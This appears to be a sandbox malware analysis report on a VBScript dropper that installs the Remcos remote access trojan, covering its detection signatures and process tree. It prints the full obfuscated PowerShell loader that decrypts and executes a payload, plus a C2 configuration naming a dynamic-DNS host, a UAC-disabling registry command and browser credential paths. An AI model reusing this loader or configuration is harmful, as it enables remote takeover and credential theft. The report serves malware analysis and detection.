Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
screensimplethingstohandlecream.gIF.vbs

Overview

General Information

Sample name:screensimplethingstohandlecream.gIF.vbs
Analysis ID:1483433
MD5:91143de27aed4b3ae7741994bc065faa
SHA1:85dfa644d5397b58383c94a4a898484a7fa5b8ce
SHA256:63062215f38fde4985340ec9f4fb8746320d830be8e0c534ab3fbae7d3e89f29
Tags:vbs
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Cscript/Wscript Uncommon Script Extension Execution
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2076 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 1344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 7228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkpfvnsml" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 7236 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xeupwfcgzmvn" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 7252 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 7268 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "maveing.duckdns.org:18576:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-F4JFYD", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Notepo\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x14f20:$a1: Remcos restarted by watchdog!
          • 0x15498:$a3: %02i:%02i:%02i:%03i
          00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 17 entries
            SourceRuleDescriptionAuthorStrings
            3.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              3.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                3.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6c4a8:$a1: Remcos restarted by watchdog!
                • 0x6ca20:$a3: %02i:%02i:%02i:%03i
                3.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
                • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x6656c:$str_b2: Executing file:
                • 0x675ec:$str_b3: GetDirectListeningPort
                • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x67118:$str_b7: \update.vbs
                • 0x66594:$str_b9: Downloaded file:
                • 0x66580:$str_b10: Downloading file:
                • 0x66624:$str_b12: Failed to upload file:
                • 0x675b4:$str_b13: StartForward
                • 0x675d4:$str_b14: StopForward
                • 0x67070:$str_b15: fso.DeleteFile "
                • 0x67004:$str_b16: On Error Resume Next
                • 0x670a0:$str_b17: fso.DeleteFolder "
                • 0x66614:$str_b18: Uploaded file:
                • 0x665d4:$str_b19: Unable to delete:
                • 0x67038:$str_b20: while fso.FileExists("
                • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
                3.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x6637c:$s1: CoGetObject
                • 0x66390:$s1: CoGetObject
                • 0x663ac:$s1: CoGetObject
                • 0x70338:$s1: CoGetObject
                • 0x6633c:$s2: Elevation:Administrator!new:
                Click to see the 15 entries
                SourceRuleDescriptionAuthorStrings
                amsi64_6744.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  amsi64_6744.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs", ProcessId: 2076, ProcessName: wscript.exe
                    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = 